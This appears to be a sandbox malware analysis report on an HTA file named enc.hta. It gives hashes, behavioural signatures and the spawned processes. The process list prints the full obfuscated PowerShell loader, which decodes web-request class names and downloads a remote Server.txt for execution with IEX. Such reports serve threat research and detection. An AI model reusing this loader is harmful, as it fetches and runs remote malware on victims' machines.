Analysis
-
max time kernel
43s -
max time network
46s -
platform
windows7_x64 -
resource
win7-20220718-en -
resource tags
arch:x64arch:x86image:win7-20220718-enlocale:en-usos:windows7-x64system -
submitted
09-08-2022 19:09
Static task
static1
Behavioral task
behavioral1
Sample
enc.hta
Resource
win7-20220718-en
windows7-x64
5 signatures
150 seconds
Behavioral task
behavioral2
Sample
enc.hta
Resource
win10v2004-20220722-en
windows10-2004-x64
11 signatures
150 seconds
General
-
Target
enc.hta
-
Size
4KB
-
MD5
a22a14258d33638343e40b4ef674b06d
-
SHA1
172a63be58e0a1c0d4a4b0a933d74b6af9164ddc
-
SHA256
5ea0ac297ec8f31acc2fa0c4475d2bcf044b2699e2417a8aa650d1b742ade518
-
SHA512
eb1c994e51bb36dbbbe54e64d642276e6924d332611c072ef215ff0cd17439187ca15467f1848526a1fd9c279b96c4cd2446e83fd992eb94c58daa965a1eda58
Score
10/10
Malware Config
Signatures
-
Process spawned unexpected child process 1 IoCs
This typically indicates the parent process was compromised via an exploit or macro.
Processes:
POWERSHELL.exedescription pid pid_target process target process Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 1632 1780 POWERSHELL.exe -
Drops file in System32 directory 1 IoCs
Processes:
POWERSHELL.exedescription ioc process File opened for modification C:\Windows\System32\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk POWERSHELL.exe -
Processes:
mshta.exedescription ioc process Key created \REGISTRY\USER\S-1-5-21-4084403625-2215941253-1760665084-1000\Software\Microsoft\Internet Explorer\Main mshta.exe -
Suspicious behavior: EnumeratesProcesses 1 IoCs
Processes:
POWERSHELL.exepid process 1632 POWERSHELL.exe -
Suspicious use of AdjustPrivilegeToken 1 IoCs
Processes:
POWERSHELL.exedescription pid process Token: SeDebugPrivilege 1632 POWERSHELL.exe
Processes
-
C:\Windows\SysWOW64\mshta.exeC:\Windows\SysWOW64\mshta.exe "C:\Users\Admin\AppData\Local\Temp\enc.hta"1⤵
- Modifies Internet Explorer settings
-
C:\Windows\System32\WindowsPowerShell\v1.0\POWERSHELL.exePOWERSHELL $HFTCVFLOZOSBOCVIDADWLIO = '[#])02!^#13_27<&{+}<&{@y#])02!^#13_27<&{+}<&{@t/##47)<+=%3#+^(*16!&@_\)&!_32%510#])\59(}}17.IO.#])02!^#13_27<&{+}<&{@t)[$76%=_)7%2/8\\5[#!@7/##47)<+=%3#+^(*16!&@_/{0265}}78<0{&_<$&/3}[\)&!_32%510#])\59(}}17)[$76%=_)7%2/8\\5[#!@7/##47)<+=%3#+^(*16!&@_/{0265}}78<0{&_<$&/3}[d/##47)<+=%3#+^(*16!&@_)[$76%=_)7%2/8\\5[#!@7]'.Replace('#])02!^#13_27<&{+}<&{@','S').Replace('/##47)<+=%3#+^(*16!&@_','E').Replace(')[$76%=_)7%2/8\\5[#!@7','R').Replace('/{0265}}78<0{&_<$&/3}[','A').Replace('\)&!_32%510#])\59(}}17','M');$HDSRYDZAWTNCWJSVNHKAAWK = ($HFTCVFLOZOSBOCVIDADWLIO -Join '')|&('I'+'EX');$HQNBVPIZRQRPUJTZLAHQUHN = '[2)%@85#]@9@4[_^}^=--4/y2)%@85#]@9@4[_^}^=--4/1{-9)%443833)4=724_<1@1@)2308@8<[+(\]9}\28_1m.N1@)2308@8<[+(\]9}\28_11{-9)%443833)4=724_<1@.W1@)2308@8<[+(\]9}\28_1bR1@)2308@8<[+(\]9}\28_1qu1@)2308@8<[+(\]9}\28_12)%@85#]@9@4[_^}^=--4/1{-9)%443833)4=724_<1@]'.Replace('2)%@85#]@9@4[_^}^=--4/','S').Replace('1@)2308@8<[+(\]9}\28_1','E').Replace('1{-9)%443833)4=724_<1@','T');$HJZPGAAEFSGITSRIZPKUQBS = ($HQNBVPIZRQRPUJTZLAHQUHN -Join '')|&('I'+'EX');$HDUYAYRATSZBQJRJZHWQLLX = '[&1\&@*}8\\)_8^[*1)6%\r4]{/3<*/\(-[_}}))}3{14a-=*6\]7}0^-/#54(0*90<04]{/3<*/\(-[_}}))}3{14'.Replace('[&1\&@*}8\\)_8^[*1)6%\','C').Replace('4]{/3<*/\(-[_}}))}3{14','E').Replace('-=*6\]7}0^-/#54(0*90<0','T');$HNIKFEBTGQHWZRRONHNVHCJ = '[}*_2/#{3_]143@]3_-3993=#_^2&^&=4$[-(8[8$tR3=#_^2&^&=4$[-(8[8$ #127#^(&]1(=}8@$!9*56pon2#127#^(&]1(=}8@$!9*563=#_^2&^&=4$[-(8[8$'.Replace('[}*_2/#{3_]143@]3_-399','G').Replace('3=#_^2&^&=4$[-(8[8$','E').Replace('2#127#^(&]1(=}8@$!9*56','S');$HUDDTIGVYNHICUBUGQZNRZL = 'G#92-1^}48[/]&![(4+{289t==58=<^5&7<_9/*&}0+&^1#92-1^}48[/]&![(4+{289]_7)0}{^)-]<+1)%[51\68pon]_7)0}{^)-]<+1)%[51\68#92-1^}48[/]&![(4+{289]_7)0}{^)-]<+1)%[51\68t==58=<^5&7<_9/*&}0+&^1#92-1^}48[/]&![(4+{289am'.Replace(']_7)0}{^)-]<+1)%[51\68','S').Replace('#92-1^}48[/]&![(4+{289','E').Replace('==58=<^5&7<_9/*&}0+&^1','R');$HNSNPLGHWJCBKWXNBDGSZHJ = '2}^0)91!45<5*!)-{[)40-][3\1([^@=-++0=$!8473[a_4@8]2&}\@=9\)7=8$%)-9To][3\1([^@=-++0=$!8473[n_4@8]2&}\@=9\)7=8$%)-9'.Replace('2}^0)91!45<5*!)-{[)40-','R').Replace('][3\1([^@=-++0=$!8473[','E').Replace('_4@8]2&}\@=9\)7=8$%)-9','D');&('I'+'EX')($HDSRYDZAWTNCWJSVNHKAAWK::new($HJZPGAAEFSGITSRIZPKUQBS::$HDUYAYRATSZBQJRJZHWQLLX('https://tradeguru.com.pk/Server.txt').$HNIKFEBTGQHWZRRONHNVHCJ().$HUDDTIGVYNHICUBUGQZNRZL()).$HNSNPLGHWJCBKWXNBDGSZHJ())1⤵
- Process spawned unexpected child process
- Drops file in System32 directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
Network
MITRE ATT&CK Matrix ATT&CK v6
Replay Monitor
Loading Replay Monitor...
Downloads
-
memory/1632-54-0x000007FEFBEC1000-0x000007FEFBEC3000-memory.dmpFilesize
8KB
-
memory/1632-55-0x000007FEF43F0000-0x000007FEF4E13000-memory.dmpFilesize
10.1MB
-
memory/1632-56-0x000007FEEEA90000-0x000007FEEF5ED000-memory.dmpFilesize
11.4MB
-
memory/1632-57-0x00000000027C4000-0x00000000027C7000-memory.dmpFilesize
12KB
-
memory/1632-59-0x00000000027CB000-0x00000000027EA000-memory.dmpFilesize
124KB
-
memory/1632-58-0x00000000027C4000-0x00000000027C7000-memory.dmpFilesize
12KB